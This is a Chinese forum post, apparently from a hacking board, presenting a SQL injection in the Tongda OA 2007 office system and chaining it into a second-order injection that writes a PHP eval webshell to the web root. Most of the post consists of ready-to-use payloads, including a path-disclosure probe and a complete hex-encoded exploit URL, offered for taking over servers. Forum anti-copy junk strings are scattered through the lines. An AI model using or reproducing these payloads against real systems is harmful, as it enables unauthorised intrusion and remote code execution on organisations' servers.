找回密码
 立即注册
查看: 3266|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本
, h8 }+ U  X# ^4 {3 h2 N8 Z3 H3 |8 w1 J& V, e- c

, d8 }3 u; T  J; v' DOffice Anywhere 2007 网络智能办公系统
& j4 T$ Y, L5 g" s  D
3 q/ N# ]; l4 p, [. y* ]http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..# x" u* z  A  h, J

5 g0 S! }; G6 O
2 P9 |: z& E( m% `$ K" L这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的! ?2 C% L; @' V% d! E. C6 o! p' j
3 Z! [1 }) F$ h1 K  \2 f
例如:SELECT * from USER where USER_ID='{$USERNAME}'  
" n* g$ S. L& m$ ^2 ?, g' `/ B: g, u其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
. W9 C2 v. s" K- }8 ~5 L 6 C( ^- ~% N2 A8 c
这个时候我们是不是可以组合起来使用哪?8 I: p% K0 f) V! V( y, B+ d& T

& d6 P8 s' }$ K2 F$ K4 x( @第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样' `) b* O$ N# ?( f( H6 ]
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10: L* Q0 P. k; B2 {5 d
% q6 O5 Y; d! e8 J
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
" T; e* k' s0 Q4 O. x* V, h + l) m& }" X5 l4 v5 e: b; C: @# J
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。4 i* N9 j: O. d1 E( d
9 F7 @3 g, k9 k  k
那么我们用字符串格式带入进行hex编码
* ~( G: Z' b8 r8 [  R' t  t7 m1 N 0 ^( y( y! x8 [" z' t
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23$ \2 r+ _7 d: G( t$ m

2 Y  a+ r$ I, L6 N) [$ A测试ok,获取oa的webshell
+ I& m4 X% t  \& j  \9 j' U 7 f. j% {* [$ |( g
2 a; ~6 Z0 J7 Y1 Y% V  Q
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
& b5 W% s% T9 r( n) O直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表